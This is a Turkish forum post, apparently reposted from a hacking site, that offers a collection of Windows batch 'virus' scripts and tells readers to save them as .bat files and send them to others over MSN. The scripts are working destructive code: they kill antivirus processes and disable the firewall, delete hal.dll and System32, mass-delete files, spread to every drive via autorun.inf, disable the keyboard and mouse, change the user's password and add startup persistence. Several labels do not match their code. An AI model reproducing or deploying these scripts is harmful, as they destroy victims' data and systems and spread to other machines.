Select Language :       
1 2 3 4 5 6 7
closeSitemizde Banner Değişim Ağı Açıldı Katılmak İçin Tıkla !

TrPC TÜRKİYE | Yardım Platformu

31 Virüs Kodu

Arkadaşlar alıntıdır.Kendim hazırlamadım www.turkhackteam.net'ten alıntıdır tam 34 tane virüs kodu.kullanımı çok basit. istediğin kodu kopyala,metin belgesine yapıştır,uzantısını .bat yap,msn den winrar ile yolla gitsin .Hepsini bir metin belgesine de kopyalıyabilirsiniz.İnanılmaz öldürücü bir virüs yaratmış olursunuz.Yalnız bir uyar yapayım bu kodlerı göndererek  birine zarar vermek amaçlı kullanılırsa hakkınızda işlem başlatılabilir... TrPC TÜRKİYE Yönetimi

Bütün antivirüsleri patlatır.xD Etkili

@echo off
Kod:
rem ---------------------------------
rem Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
rem ---------------------------------
Format atar 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%WINDOWSsystem32hal.dll
shutdown /s /t 00
rem ---------------------------------
Bilgisayardaki tüm png uzantılı dosyalrı siler
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All Png
DIR /S/B %SystemDrive%*.png >> FIleList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
rem ---------------------------------
Bilgisayardaki exe uzantılı dosyaları siler 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------
Bilgisayarda mp4 uzantılı dosyaları siler
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All Mp4
DIR /S/B %SystemDrive%*.mp4 >> FIleList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"
rem ---------------------------------
Bilgisayarda mp3 uzantılı dosyaları siler
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All Mp3
DIR /S/B %SystemDrive%*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
rem ---------------------------------
System32 yi siler xD (yani format)
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete System32 folder
del /f /q %SystemDrive%WINDOWSsystem32*.*
shutdown /s /t 00
rem ---------------------------------
Bilgisayara solucan bulaştırarak hdd yi doldurur.Kendini başka pc lere kopyalar
Kod:
@echo off
Kod:
rem ---------------------------------
rem Spam With VBScript Msgboxes
echo Do>>msgbox.vbs
echo x=msgbox("Your computer have been owned with a virus!",0+48,"Infected") >>msgbox.vbs
echo Loop>>msgbox.vbs
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
rem ---------------------------------
Bilgisayardaki tüm sürücüleri siler.Ve kendini kopyalar 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:
echo [AutoRun] > %%E:autorun.inf
echo open="%%E:%0" >> %%E:autorun.inf
echo action=Open folder to see files... >> %%E:autorun.inf)
rem ---------------------------------
Klavyeyi patlatır 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlKeyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00, >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00, >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37, >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00, >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00, >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00, >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49, >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00, >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00, >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00, >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16, >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00, >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00, >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00, >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30, >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00, >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00, >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00, >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a, >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0, >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------
Mause kaybeder.Görünmez,kullanıcı kafayı yer 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Cd-Rom u açıp kapatır.dakikada 31 kere 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Start Opening Disk Tray
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
rem ---------------------------------
Autoexec.bat dosyasına infeck bulaştırır
Kod:
@echo off
Kod:
rem ---------------------------------
rem Infect Autoexec.bat
echo start "" %0>>%SystemDrive%AUTOEXEC.BAT
rem ---------------------------------
Solucan virüsü oluşturur.hata mesajları yollar
Kod:
@echo off
Kod:
rem ---------------------------------
rem Spam Local Disk
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
echo %random% > C:%random%.txt
rem ---------------------------------
Kullanıcının şifresini değiştirir
Kod:
@echo off
Kod:
rem ---------------------------------
rem Change User Password To EmirejCrewOwnedAgain
net user %username% EmirejCrewOwnedAgain
rem --------------------------------
Reg Run keylerini infekte eder.Makine Kafayı yer
Kod:
@echo off
Kod:
rem ---------------------------------
rem Infect Reg Run Key
set valinf="rundll32_%random%_toolbar"
set reginf="hklmSoftwareMicrosoftWindowsCurrentVersionRun"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------
Resimleri siler
Kod:
@echo off
Kod:
rem --------------------------------- 
rem Delete My Pictures
del /f /q %userprofile%My Pictures*.*
rem --------------------------------- 
rem --------------------------------- 
rem Delete Mes images
del /f /q %userprofile%Mes images*.*
rem --------------------------------- 
Müzikleri siler 
Kod:
@echo off
Kod:
rem --------------------------------- 
rem Delete My Pictures
del /f /q %userprofile%My Pictures*.*
rem --------------------------------- 
rem --------------------------------- 
rem Delete Mes images
del /f /q %userprofile%Mes images*.*
rem --------------------------------- 
Worm Skın
Kod:
@echo off
Kod:
rem ---------------------------------
rem Spam Printer
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
notepad /P "Spam.txt"
rem ---------------------------------
Windows klasörünü siler.xD
Kod:
@echo off
Kod:
rem ---------------------------------
rem Spam Printer
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
